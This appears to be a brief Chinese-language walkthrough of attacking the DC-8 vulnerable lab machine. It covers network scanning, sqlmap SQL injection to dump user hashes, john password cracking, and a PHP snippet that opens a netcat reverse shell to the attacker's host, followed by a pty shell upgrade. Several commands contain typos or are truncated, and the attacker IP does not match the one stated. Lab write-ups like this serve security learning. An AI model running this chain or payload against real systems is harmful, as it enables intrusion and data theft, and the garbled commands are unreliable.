攻击机kali IP:192.168.48.130
靶机IP
信息收集
c段扫描
arp-scan -l
扫描DC-8
nmap -sV -p- 192.168.48.145
访问一下
点击页面发现uil有参数,可能有sql注入
sqlmaop跑一下
qlmap -u"http://192.168.48.145" --dbs
qlmap -u"http://192.168.48.145" -D d7db --tables
-u"http://192.168.48.145" -D d7db -T users --dump
将两行密码放入1.txt
使用john破解
john 1.txt
对网站进行目录和文件扫描
看看rokots.txt文件
发现登陆页面
用刚才的admin和john登陆试试发现john登陆成功
发现这个地方可以执行php代码
选择php code 然后写反弹shell命令
<?php system("nc -e /bin/bash 192.168.47.129 7897"); ?>
这里的IP地址为kali的IP地址
提交
kali打开端口监听
在view随便输入一些信息进行提交
shell反弹成功
获得一个交互式的shell
python -c "import pty; pty.spawn('/bin/bash')"